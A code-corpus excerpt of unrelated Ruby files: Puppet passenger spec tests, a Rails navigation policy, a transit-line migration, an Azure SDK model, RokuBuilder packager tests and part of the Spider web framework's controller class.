:concat_basedir => '/dne',
:id => 'root',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr"}) }
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRuby "/usr/bin/ruby"}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerDefaultRuby/) }
end
context "with Debian 8 defaults" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '8.0',
:operatingsystem => 'Debian',
:kernel => 'Linux',
:lsbdistcodename => 'jessie',
:concat_basedir => '/dne',
:id => 'root',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr/lib/ruby/vendor_ruby/phusion_passenger/locations.ini"}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerRuby/) }
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerDefaultRuby "/usr/bin/ruby"}) }
end
end
context "on a RedHat OS" do
let :facts do
{
:osfamily => 'RedHat',
:operatingsystemrelease => '6',
:concat_basedir => '/dne',
:operatingsystem => 'RedHat',
:id => 'root',
:kernel => 'Linux',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_apache__mod('zpassenger') }
it { is_expected.to contain_package("mod_passenger") }
it { is_expected.to contain_file('passenger_package.conf').with({
'path' => '/etc/httpd/conf.d/passenger.conf',
}) }
it { is_expected.to contain_file('passenger_package.conf').without_content }
it { is_expected.to contain_file('passenger_package.conf').without_source }
it { is_expected.to contain_file('zpassenger.load').with({
'path' => '/etc/httpd/conf.d/zpassenger.load',
}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerRoot/) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerRuby/) }
describe "with passenger_root => '/usr/lib/example'" do
let :params do
{ :passenger_root => '/usr/lib/example' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerRoot "\/usr\/lib\/example"$/) }
end
describe "with passenger_ruby => /usr/lib/example/ruby" do
let :params do
{ :passenger_ruby => '/usr/lib/example/ruby' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerRuby "\/usr\/lib\/example\/ruby"$/) }
end
end
context "on a FreeBSD OS" do
let :facts do
{
:osfamily => 'FreeBSD',
:operatingsystemrelease => '9',
:concat_basedir => '/dne',
:operatingsystem => 'FreeBSD',
:id => 'root',
:kernel => 'FreeBSD',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_apache__mod('zpassenger') }
it { is_expected.to contain_package("www/rubygem-passenger") }
end
context "on a Gentoo OS" do
let :facts do
{
:osfamily => 'Gentoo',
:operatingsystem => 'Gentoo',
:operatingsystemrelease => '3.16.1-gentoo',
:concat_basedir => '/dne',
:id => 'root',
:kernel => 'Linux',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_apache__mod('zpassenger') }
it { is_expected.to contain_package("www-apache/passenger") }
end
end
| 42.429577 | 150 | 0.568133 |
33a028a4c27e44b5e83c021c6505d149569b8cfd | 1,810 | class NavigationPolicy
attr_accessor :user, :navigation
def initialize(user, navigation)
@user = user
@navigation = navigation
add_dynamic_methods
ensure_admin
end
def registered?
! user.nil?
end
def allow_local_signup?
NavigationPolicy.configured_for_local_signup?
end
def self.allow_local_signup(controller)
controller.authorize(:navigation, :allow_local_signup?)
end
def add_dynamic_methods
Roles::ALL_ROLES.each do |role|
self.define_singleton_method("#{role}?".to_sym) do
user.has_role?(role)
end
end
Roles::COMPOSITE_ROLES.each_pair do |method_name, role_array|
self.define_singleton_method("#{method_name}?".to_sym) do
return false unless registered?
(@user.roles.map(&:name) & role_array).length != 0
end
end
end
def ensure_admin
return false unless registered?
# promote the first user to an admin
if User.count == 1 && user.is_a?(User) && !user.has_role?(Roles::SUPER_USER)
user.add_role(Roles::SUPER_USER)
user.save
end
end
def self.add_action_methods(on)
#on is a controller
#dynamically add authorization methods
(Roles::ALL_ROLES + Roles::COMPOSITE_ROLES.keys).each do |role|
method = "#{role}".to_sym
method_q = "#{role}?".to_sym
on.define_singleton_method(method) do
authorize(:navigation, method_q)
end
on.define_singleton_method(method_q) do
authorize(:navigation, method_q) rescue false
end
end
end
private
def self.configured_for_local_signup?
exclude_envs = ($PROPS['PRISME.disallow_local_signups_on']).split(',').map(&:strip) rescue []
!exclude_envs.include?(PRISME_ENVIRONMENT)
end
end
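# Illustrative sketch (not part of the original class): for a hypothetical role
# name "editor" in Roles::ALL_ROLES, add_dynamic_methods defines an editor?
# predicate on each policy instance, delegating to user.has_role?("editor"):
#
#   policy = NavigationPolicy.new(current_user, :navigation)
#   policy.registered?   # => true once a user is signed in
#   policy.editor?       # => current_user.has_role?("editor")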
=begin
load('./app/policies/navigation_policy.rb')
=end | 24.459459 | 97 | 0.687293 |
e20cee13bfa20933352decc7fd674d06585c6eb1 | 986 | class FixLineDirections < ActiveRecord::Migration[5.2]
def change
flushingn = ExpressLineDirection.joins(:line).find_by(lines: {name: "Flushing"}, direction: 1)
flushingn.last_branch_stop = "701N" # Flushing–Main St
flushingn.last_alternate_branch_stop = "702N" # Mets–Willets Pt
flushingn.save!
flushings = ExpressLineDirection.joins(:line).find_by(lines: {name: "Flushing"}, direction: 3)
flushings.first_branch_stop = "701S" # Flushing–Main St
flushings.first_alternate_branch_stop = "702S" # Mets–Willets Pt
flushings.save!
jamaican = LineDirection.joins(:line).find_by(lines: {name: "Jamaica (Myrtle Avenue—Crescent Street)"}, direction: 1)
jamaican.first_alternate_branch_stop = "J27N" # Broadway Jct
jamaican.save!
jamaicas = LineDirection.joins(:line).find_by(lines: {name: "Jamaica (Myrtle Avenue—Crescent Street)"}, direction: 3)
jamaicas.last_alternate_branch_stop = "J27S" # Broadway Jct
jamaicas.save!
end
end
| 44.818182 | 121 | 0.733266 |
03ca73f257ada535e7b1e9bbfd3dc855eea7d16e | 1,569 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2019_07_01
module Models
#
# The List Virtual Machine operation response.
#
class VirtualMachineSizeListResult
include MsRestAzure
# @return [Array<VirtualMachineSize>] The list of virtual machine sizes.
attr_accessor :value
#
# Mapper for VirtualMachineSizeListResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'VirtualMachineSizeListResult',
type: {
name: 'Composite',
class_name: 'VirtualMachineSizeListResult',
model_properties: {
value: {
client_side_validation: true,
required: false,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'VirtualMachineSizeElementType',
type: {
name: 'Composite',
class_name: 'VirtualMachineSize'
}
}
}
}
}
}
}
end
end
end
end
| 28.017857 | 78 | 0.525175 |
0320f819dcddba4469f8ed25e6e5f29f8cc66860 | 10,576 | # ********** Copyright Viacom, Inc. Apache 2.0 **********
require_relative "../test_helper.rb"
module RokuBuilder
class PackagerTest < Minitest::Test
def setup
Logger.set_testing
RokuBuilder.class_variable_set(:@@dev, false)
RokuBuilder.setup_plugins
register_plugins(Packager)
@requests = []
end
def teardown
@requests.each {|req| remove_request_stub(req)}
end
def test_packager_parse_options_long
parser = OptionParser.new
options = {}
Packager.parse_options(parser: parser, options: options)
argv = ["roku", "--package", "--key", "--genkey", "--inspect-package"]
parser.parse! argv
assert options[:package]
assert options[:key]
assert options[:genkey]
assert options[:inspect_package]
end
    def test_packager_parse_options_short
parser = OptionParser.new
options = {}
Packager.parse_options(parser: parser, options: options)
argv = ["roku", "-p", "-k", "-i"]
parser.parse! argv
assert options[:package]
assert options[:key]
assert options[:inspect_package]
end
def test_packager_current
config, options = [nil, nil]
Pathname.stub(:pwd, test_files_path(PackagerTest)) do
config, options = build_config_options_objects(PackagerTest, {package: true, current: true}, false)
end
packager = Packager.new(config: config)
assert_raises InvalidOptions do
packager.package(options: options)
end
end
def test_packager_in
config, options = build_config_options_objects(PackagerTest, {package: true, in: "/tmp/test.pkg"}, false)
packager = Packager.new(config: config)
assert_raises InvalidOptions do
packager.package(options: options)
end
end
def test_packager_ref
config, options = build_config_options_objects(PackagerTest, {package: true, ref: "test_ref"}, false)
packager = Packager.new(config: config)
assert_raises InvalidOptions do
packager.package(options: options)
end
end
def test_packager_package_failed
config, options = build_config_options_objects(PackagerTest, {package: true, stage: "production"}, false)
@requests.push(stub_request(:post, "http://192.168.0.100:8060/keypress/Home").
to_return(status: 200, body: "", headers: {}))
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_install").
to_return(status: 200, body: "", headers: {}))
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: "Failed: Error.", headers: {}))
packager = Packager.new(config: config)
assert_raises ExecutionError do
packager.package(options: options)
end
end
def test_packager_package
loader = Minitest::Mock.new
inspector = Minitest::Mock.new
io = Minitest::Mock.new
logger = Minitest::Mock.new
config, options = build_config_options_objects(PackagerTest, {package: true, stage: "production", inspect_package: true, verbose: true}, false)
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_inspect").
to_return(status: 200, body: "", headers: {}).times(2))
body = "<a href=\"pkgs\">pkg_url</a>"
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}).times(2))
body = "package_body"
@requests.push(stub_request(:get, "http://192.168.0.100/pkgs/pkg_url").
to_return(status: 200, body: body, headers: {}))
loader.expect(:sideload, nil, [Hash])
io.expect(:write, nil, ["package_body"])
inspector.expect(:inspect, nil, [Hash])
logger.expect(:debug, nil, [String])
io.expect(:each_line, nil)
logger.expect(:info, nil) do |message|
assert_match(/#{tmp_folder}/, message)
end
Logger.class_variable_set(:@@instance, logger)
packager = Packager.new(config: config)
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
Loader.stub(:new, loader) do
Time.stub(:now, Time.at(0)) do
File.stub(:open, nil, io) do
Inspector.stub(:new, inspector) do
packager.stub(:dev_id, dev_id) do
packager.package(options: options)
end
end
end
end
end
io.verify
loader.verify
inspector.verify
logger.verify
end
def test_packager_package_squash
loader = Minitest::Mock.new
inspector = Minitest::Mock.new
io = Minitest::Mock.new
logger = Minitest::Mock.new
config = good_config(PackagerTest)
config[:projects][:project1][:stages][:production][:squash] = true
config, options = build_config_options_objects(PackagerTest, {package: true, stage: "production", inspect_package: true, verbose: true}, false, config)
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_inspect").
to_return(status: 200, body: "", headers: {}).times(2))
body = "<a href=\"pkgs\">pkg_url</a>"
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}).times(2))
body = "package_body"
@requests.push(stub_request(:get, "http://192.168.0.100/pkgs/pkg_url").
to_return(status: 200, body: body, headers: {}))
loader.expect(:sideload, nil, [Hash])
loader.expect(:squash, nil, [Hash])
io.expect(:write, nil, ["package_body"])
inspector.expect(:inspect, nil, [Hash])
logger.expect(:debug, nil, [String])
io.expect(:each_line, nil)
logger.expect(:info, nil) do |message|
assert_match(/#{tmp_folder}/, message)
end
Logger.class_variable_set(:@@instance, logger)
packager = Packager.new(config: config)
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
Loader.stub(:new, loader) do
Time.stub(:now, Time.at(0)) do
File.stub(:open, nil, io) do
Inspector.stub(:new, inspector) do
packager.stub(:dev_id, dev_id) do
packager.package(options: options)
end
end
end
end
end
io.verify
loader.verify
inspector.verify
logger.verify
end
def test_packager_dev_id
body = "v class=\"roku-font-5\"><label>Your Dev ID: </label> dev_id<hr></div>"
@requests.push(stub_request(:get, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}))
config = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false)[0]
packager = Packager.new(config: config)
dev_id = packager.dev_id
assert_equal "dev_id", dev_id
end
def test_packager_dev_id_old_interface
body = "<p> Your Dev ID: <font face=\"Courier\">dev_id</font> </p>"
@requests.push(stub_request(:get, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}))
config = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false)[0]
packager = Packager.new(config: config)
dev_id = packager.dev_id
assert_equal "dev_id", dev_id
end
def test_packager_key_changed
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_inspect").
to_return(status: 200, body: "", headers: {}))
logger = Minitest::Mock.new
logger.expect(:debug, nil) {|s| s =~ /\d* -> \d*/}
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
config, options = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false)
packager = Packager.new(config: config)
Logger.class_variable_set(:@@instance, logger)
packager.stub(:dev_id, dev_id) do
packager.key(options: options)
end
end
def test_packager_key_same
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_inspect").
to_return(status: 200, body: "", headers: {}))
logger = Minitest::Mock.new
logger.expect(:info, nil) {|s| s =~ /did not change/}
logger.expect(:debug, nil) {|s| s =~ /\d* -> \d*/}
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
config, options = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false)
packager = Packager.new(config: config)
Logger.class_variable_set(:@@instance, logger)
packager.stub(:dev_id, dev_id) do
packager.key(options: options)
end
end
def test_packager_generate_new_key
connection = Minitest::Mock.new()
connection.expect(:puts, nil, ["genkey"])
connection.expect(:waitfor, nil) do |config, &blk|
assert_equal(/./, config['Match'])
assert_equal(false, config['Timeout'])
txt = "Password: password\nDevID: devid\n"
blk.call(txt)
true
end
connection.expect(:close, nil, [])
config = build_config_options_objects(PackagerTest, {genkey: true}, false)[0]
packager = Packager.new(config: config)
Net::Telnet.stub(:new, connection) do
packager.send(:generate_new_key)
end
end
def test_packager_no_key
config = good_config(PackagerTest)
config[:projects][:project1][:stages][:production].delete(:key)
config, options = build_config_options_objects(PackagerTest, {key: true, stage: "production"}, false, config)
packager = Packager.new(config: config)
dev_id = Proc.new {"#{Random.rand(999999999999)}"}
assert_raises ExecutionError do
packager.stub(:dev_id, dev_id) do
packager.key(options: options)
end
end
end
def test_packager_genkey
loader = Minitest::Mock.new
loader.expect(:sideload, nil, [Hash])
body = "<a href=\"pkgs\">pkg_url</a>"
@requests.push(stub_request(:post, "http://192.168.0.100/plugin_package").
to_return(status: 200, body: body, headers: {}))
@requests.push(stub_request(:get, "http://192.168.0.100/pkgs/pkg_url").
to_return(status: 200, body: "", headers: {}))
config, options = build_config_options_objects(PackagerTest, {genkey: true}, false)
packager = Packager.new(config: config)
Loader.stub(:new, loader) do
packager.stub(:generate_new_key, ["password", "dev_id"]) do
packager.genkey(options: options)
end
end
loader.verify
end
end
end
| 38.739927 | 157 | 0.635401 |
d51bc0007b8c21f3db9624ecf8620cb7acdcfe7a | 2,251 | # Tests in this file ensure that:
#
# * plugin controller actions are found
# * actions defined in application controllers take precedence over those in plugins
# * actions in controllers in subsequently loaded plugins take precedence over those in previously loaded plugins
# * this works for actions in namespaced controllers accordingly
require File.dirname(__FILE__) + '/../test_helper'
class ControllerLoadingTest < ActionController::TestCase
def setup
@request = ActionController::TestRequest.new
@response = ActionController::TestResponse.new
end
# plugin controller actions should be found
def test_WITH_an_action_defined_only_in_a_plugin_IT_should_use_this_action
get_action_on_controller :an_action, :alpha_plugin
assert_response_body 'rendered in AlphaPluginController#an_action'
end
def test_WITH_an_action_defined_only_in_a_namespaced_plugin_controller_IT_should_use_this_action
get_action_on_controller :an_action, :alpha_plugin, :namespace
assert_response_body 'rendered in Namespace::AlphaPluginController#an_action'
end
# app takes precedence over plugins
def test_WITH_an_action_defined_in_both_app_and_plugin_IT_should_use_the_one_in_app
get_action_on_controller :an_action, :app_and_plugin
assert_response_body 'rendered in AppAndPluginController#an_action (from app)'
end
def test_WITH_an_action_defined_in_namespaced_controllers_in_both_app_and_plugin_IT_should_use_the_one_in_app
get_action_on_controller :an_action, :app_and_plugin, :namespace
assert_response_body 'rendered in Namespace::AppAndPluginController#an_action (from app)'
end
  # subsequently loaded plugins take precedence over previously loaded plugins
def test_WITH_an_action_defined_in_two_plugin_controllers_IT_should_use_the_latter_of_both
get_action_on_controller :an_action, :shared_plugin
assert_response_body 'rendered in SharedPluginController#an_action (from beta_plugin)'
end
def test_WITH_an_action_defined_in_two_namespaced_plugin_controllers_IT_should_use_the_latter_of_both
get_action_on_controller :an_action, :shared_plugin, :namespace
assert_response_body 'rendered in Namespace::SharedPluginController#an_action (from beta_plugin)'
end
end
| 43.288462 | 114 | 0.838294 |
7911e741a541b129a14e46e8af379c988f534744 | 893 | # Get twilio-ruby from twilio.com/docs/ruby/install
require 'rubygems' # This line not needed for ruby > 1.8
require 'twilio-ruby'
# Get your Account Sid and Auth Token from twilio.com/user/account
account_sid = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
auth_token = 'your_auth_token'
workspace_sid = 'WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
task_sid = 'WTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
reservation_sid = 'WRXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
client = Twilio::REST::TaskRouterClient.new account_sid,
auth_token,
workspace_sid
reservation = client.workspace
.tasks.get(task_sid)
.reservations.get(reservation_sid)
reservation.update(instruction: 'dequeue', dequeueFrom: '+18001231234')
puts reservation.reservation_status
puts reservation.worker_name
| 38.826087 | 71 | 0.690929 |
ab14c23360ce7b15d471f6b1fd59389e26968a2a | 175 | class AddSelectionProcessToEvents < ActiveRecord::Migration[5.1]
def change
add_column :events, :selection_by_organizer, :boolean, default: false, null: false
end
end
| 29.166667 | 86 | 0.777143 |
b9ec8621e99ea99fac16416879e5d3b7d4e49288 | 1,357 | module StripeClerk
module ChargesHelper
# determine if the given user has ordered by card and if so return the charge
# given user may be nil, in which case nil is returned (save caller checking)
# nil is also returned if no stripe order was placed
# from the returned charge one may get the card (to display last4) or
# the customer to create a new charge (with the charge_customer method)
def has_charge user
return nil unless user
order = Order.where(email: user.email).where(payment_type: :stripe).order(:ordered_on).last
return nil unless order
Stripe::Charge.retrieve(order.payment_info)
end
# reusable helper to charge given customer_id for given order
# orders save the charge_id, so customers may be re-charged using that
    # (has_charge helper will return the latest charge for a user and .customer will give its id)
    # Throws any StripeError, specifically CardError
#
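    # A hedged usage sketch (variable names hypothetical), combining the two helpers
    # above to re-charge a returning customer:
    #
    #   if (previous = has_charge(current_user))
    #     charge_customer(previous.customer, new_order)
    #   end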
    def charge_customer customer_id, order
      charge = Stripe::Charge.create(
        :customer => customer_id,
        :amount => (order.total_price*100).to_i,
        :description => t(:order) + " : " + order.number,
:currency => 'eur'
)
order.pay_now
order.payment_info = charge.id
order.payment_type = "stripe"
order.save
end
end
end
| 36.675676 | 98 | 0.676492 |
877cb6e21f237d1b97a895605612165bf51ba293 | 1,372 | #coding: utf-8
$:.unshift File.expand_path("../lib", __FILE__)
require 'server_scripts/version.rb'
def self.get_files
files = []
['ext', 'lib', 'spec'].each do |folder|
files.concat Dir.glob "#{folder}/**/*"
end
files.concat(
["Gemfile", "server_scripts.gemspec", "README.md", "Rakefile"])
files
end
files = get_files
ServerScripts::DESCRIPTION = <<MSG
Easily write scripts for submitted jobs to various machines.
MSG
Gem::Specification.new do |spec|
spec.name = 'server_scripts'
spec.version = ServerScripts::VERSION
spec.authors = ['Sameer Deshmukh']
spec.email = ['[email protected]']
spec.summary = %q{Easily write scripts for submitted jobs to various machines.}
spec.description = ServerScripts::DESCRIPTION
spec.homepage = "https://github.com/v0dro/server-scripts"
spec.license = 'BSD-3 Clause'
spec.files = files
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.bindir = "bin"
spec.executables << "mem_monitor"
spec.add_runtime_dependency 'ptools'
spec.add_development_dependency 'minitest', '~> 5.11'
spec.add_development_dependency 'minitest-hooks'
spec.add_development_dependency 'minitest-fail-fast'
end
| 29.826087 | 87 | 0.6793 |
7a295c24a4ca14d6096b1fe505fbaa47535b1e18 | 199 | class Twig
module Util
def self.numeric?(value)
!!Float(value) rescue false
end
def self.truthy?(value)
%w[true yes y on 1].include?(value.to_s.downcase)
end
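    # Illustrative calls (values hypothetical), based on the definitions above:
    #   Twig::Util.numeric?('3.14')  # => true
    #   Twig::Util.numeric?('abc')   # => false
    #   Twig::Util.truthy?('Yes')    # => true
    #   Twig::Util.truthy?(0)        # => false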
end
end
| 16.583333 | 55 | 0.628141 |
3388e9ae9c036fa7bb9e9de350987c68335dd675 | 2,167 | require "#{File.join(File.dirname(__FILE__),'..','spec_helper.rb')}"
describe 'url_parse' do
describe 'Test Url Components parsing' do
it 'should return correct scheme' do
should run.with_params('ftp://www.example.com/test','scheme').and_return('ftp')
end
it 'should return correct userinfo' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','userinfo').and_return('my_user:my_pass')
end
it 'should return correct user' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','user').and_return('my_user')
end
it 'should return correct password' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','password').and_return('my_pass')
end
it 'should return correct host' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','host').and_return('www.example.com')
end
it 'should return correct port' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','port').and_return(8080)
end
it 'should return correct path' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','path').and_return('/path/to/file.php')
end
it 'should return correct query' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','query').and_return('id=1&ret=0')
end
it 'should return correct filename' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','filename').and_return('file.php')
end
it 'should return correct filetype' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','filetype').and_return('.php')
end
it 'should return correct filedir' do
should run.with_params('https://my_user:[email protected]:8080/path/to/file.php?id=1&ret=0','filedir').and_return('file')
end
end
end
| 49.25 | 146 | 0.699585 |
3824354bdba290b5d99a75f15f1d5eade4138e38 | 809 | require_relative "jekyll-open-sdg-plugins/version"
require_relative "jekyll-open-sdg-plugins/site_configuration"
require_relative "jekyll-open-sdg-plugins/validate_site_config"
require_relative "jekyll-open-sdg-plugins/fetch_remote_data"
require_relative "jekyll-open-sdg-plugins/translate_key"
require_relative "jekyll-open-sdg-plugins/translate_date"
require_relative "jekyll-open-sdg-plugins/translate_metadata_field"
require_relative "jekyll-open-sdg-plugins/create_indicators"
require_relative "jekyll-open-sdg-plugins/create_goals"
require_relative "jekyll-open-sdg-plugins/create_pages"
require_relative "jekyll-open-sdg-plugins/sdg_variables"
require_relative "jekyll-open-sdg-plugins/search_index"
require_relative "jekyll-open-sdg-plugins/validate_indicator_config"
module JekyllOpenSdgPlugins
end
| 47.588235 | 68 | 0.866502 |
26fe4583e5fa8ba8410137b48691094309944312 | 1,526 | # frozen_string_literal: true
require_relative "component/composable"
require_relative "component/intersection"
module Same
# This module should be included in every component in your application.
#
# Components are data holders. Each component class defines a small set of data that it holds. Then entities can
# have instance of components attached to them.
#
  # Ideally components should contain only a few fields. Remember, entities can
  # have as many types of components as they need, so small components help keep things flexible.
#
# Components shouldn't include any business logic. Any methods defined in a component should be there only to allow
# different types of accessing data.
#
# Sometimes components might not have any additional data, mere presence of a component on an entity can indicate
# some behavior (e.g. +Killable+ component which indicates that entity can be killed).
#
# Example component:
# class Motion
# include Same::Component
# attr_reader :speed
#
# def initialize(speed)
# @speed = speed
# end
# end
#
# entity.add Motion, 10
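  #
  # A hedged note on the generated accessor (class name hypothetical): including this
  # module in a class such as Physics::Motion derives the identifier "physics_motion"
  # from the class name and defines a reader with that name on Same::Entity.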
module Component
extend ActiveSupport::Concern
included do
@identifier = name.underscore.tr("/", "_")
singleton_class.attr_reader :identifier
Same::Entity.attr_reader @identifier
end
# Class methods for {Component}.
module ClassMethods
include Composable
def entities(store)
store[self]
end
end
end
end
| 29.921569 | 117 | 0.700524 |
6a3e68c6b4655f61462d1f040be9f9c640e704ab | 264 | require "merb-core"
require "merb-mailer/mailer"
require "merb-mailer/mail_controller"
require "merb-mailer/mailer_mixin"
Merb::Controller.send(:include, Merb::MailerMixin)
Merb.add_generators(File.join(File.dirname(__FILE__), 'generators', 'mailer_generator'))
| 29.333333 | 88 | 0.795455 |
ed745eb11bae2b3a1acb684f0036f39a34717344 | 165 | def task367(n)
  # Build an n x n matrix b where b[i][j] = a[i] - 3 * a[j], printing each element.
  a = (1..n).to_a
  b = Array.new(n) { Array.new(n) }
  for i in 0...n
    for j in 0...n
      b[i][j] = a[i] - 3 * a[j]
      puts(b[i][j])
    end
  end
  b
end
task367(3)
| 11.785714 | 31 | 0.412121 |
e869364c5be21daf5771c9499f3e8dcbd88c1fd6 | 2,684 | # typed: ignore
require 'datadog/tracing/contrib/rails/rails_helper'
require 'datadog/tracing/contrib/rails/framework'
require 'datadog/tracing/contrib/rails/middlewares'
require 'datadog/tracing/contrib/rack/middlewares'
RSpec.describe 'Rails Railtie' do
before { skip 'Test not compatible with Rails < 4.0' if Rails.version < '4.0' }
include_context 'Rails test application'
let(:routes) { { '/' => 'test#index' } }
let(:rails_options) { {} }
let(:controllers) { [controller] }
let(:controller) do
stub_const('TestController', Class.new(ActionController::Base) do
def index
head :ok
end
end)
end
RSpec::Matchers.define :have_kind_of_middleware do |expected|
match do |actual|
found = 0
while actual
found += 1 if actual.class <= expected
without_warnings { actual = actual.instance_variable_get(:@app) }
end
found == (count || 1)
end
chain :once do
@count = 1
end
chain :copies, :count
end
before do
Datadog.configure do |c|
c.tracing.instrument :rails, rails_options
end
end
describe 'with Rails integration #middleware option' do
context 'set to true' do
let(:rails_options) { super().merge(middleware: true) }
it { expect(app).to have_kind_of_middleware(Datadog::Tracing::Contrib::Rack::TraceMiddleware).once }
it { expect(app).to have_kind_of_middleware(Datadog::Tracing::Contrib::Rails::ExceptionMiddleware).once }
end
context 'set to false' do
let(:rails_options) { super().merge(middleware: false) }
after { Datadog.configuration[:rails][:middleware] = true }
it { expect(app).to_not have_kind_of_middleware(Datadog::Tracing::Contrib::Rack::TraceMiddleware) }
it { expect(app).to_not have_kind_of_middleware(Datadog::Tracing::Contrib::Rails::ExceptionMiddleware) }
end
end
describe 'when load hooks run twice' do
subject! do
# Set expectations
expect(Datadog::Tracing::Contrib::Rails::Patcher).to receive(:add_middleware)
.with(a_kind_of(Rails::Application))
.once
.and_call_original
without_warnings do
# Then load the app, which run load hooks
app
# Then manually re-run load hooks
ActiveSupport.run_load_hooks(:before_initialize, app)
ActiveSupport.run_load_hooks(:after_initialize, app)
end
end
it 'only includes the middleware once' do
expect(app).to have_kind_of_middleware(Datadog::Tracing::Contrib::Rack::TraceMiddleware).once
expect(app).to have_kind_of_middleware(Datadog::Tracing::Contrib::Rails::ExceptionMiddleware).once
end
end
end
| 30.157303 | 111 | 0.682191 |
87d9f5cdf8ecd29ce1a9799d0ae71d8056cdde22 | 20,037 | require 'spiderfw/controller/controller_io'
require 'spiderfw/controller/request'
require 'spiderfw/controller/response'
require 'spiderfw/controller/scene'
require 'spiderfw/controller/controller_exceptions'
require 'spiderfw/controller/first_responder'
require 'spiderfw/controller/controller_mixin'
require 'spiderfw/controller/mixins/visual'
require 'spiderfw/controller/mixins/http_mixin'
require 'spiderfw/controller/mixins/static_content'
require 'spiderfw/controller/helpers/widget_helper'
require 'spiderfw/utils/annotations'
module Spider
class Controller
include App::AppClass
include Dispatcher
include Logger
include ControllerMixins
include Helpers
include Annotations
class << self
def default_action
'index'
end
# @return [String] Path to this controller's templates
def template_path
return nil unless self.app
return File.join(self.app.path, '/views')
end
# @return [String] Path to this controller's layouts
def layout_path
return nil unless self.app
return File.join(self.app.path, '/views')
end
# Defines a method that will be called before the controller's before,
# if the action matches the given conditions.
# Example:
# before(/^list_/, :before_lists)
# will call the method before_lists if the action starts with 'list_'
# @param [String|Regexp|Proc|Symbol|Array] conditions what will be checked against the action
# @param [Symbol] method The method to be called if the conditions match.
# @param [Hash] params may contain :unless => true: in this case,
# the conditions will be inverted, that is, the method will
# be executed unless the conditions match.
# @return [void]
def before(conditions, method, params={})
@dispatch_methods ||= {}
@dispatch_methods[:before] ||= []
@dispatch_methods[:before] << [conditions, method, params]
end
# Like {Controller.before}, but calls the method unless the conditions match
# @param [String|Regexp|Proc|Symbol|Array] conditions what will be checked against the action
# @param [Symbol] method The method to be called if the conditions match.
# @param [Hash] params may contain :unless => true: in this case,
# the conditions will be inverted, that is, the method will
# be executed unless the conditions match.
# @return [void]
def before_unless(condition, method, params={})
@dispatch_methods ||= {}
@dispatch_methods[:before] ||= []
params[:unless] = true
@dispatch_methods[:before] << [condition, method, params]
end
# @return [Array] An array of methods defined with {Controller.before}
def before_methods
@dispatch_methods && @dispatch_methods[:before] ? @dispatch_methods[:before] : []
end
# Registers a list of methods as controller actions, that is, methods that can
# be dispatched to.
#
# This method is not usually called directly; using the __.action annotation,
# or one of the format annotations (__.html, __.xml, __.json, __.text), will
# make a method a controller action.
